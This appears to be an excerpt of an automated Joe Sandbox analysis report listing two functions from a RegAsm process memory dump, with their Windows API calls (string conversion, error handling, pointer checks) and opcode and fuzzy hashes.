                                Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99